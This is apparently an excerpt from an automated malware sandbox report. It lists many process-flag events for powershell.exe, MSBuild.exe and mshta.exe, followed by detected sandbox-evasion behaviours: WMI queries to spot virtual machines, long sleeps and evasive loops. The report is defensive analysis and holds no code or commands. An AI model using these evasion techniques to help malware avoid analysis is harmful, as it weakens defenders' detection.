Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1949
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7788

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 2732	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 852	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2400	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1916	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2112	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2376	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1532	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1532	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1144	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340	Thread sleep count: 1949 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340	Thread sleep count: 7788 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092	Thread sleep count: 94 > 30
Source: C:\Windows\System32\mshta.exe TID: 2440	Thread sleep time: -120000s >= -30000s
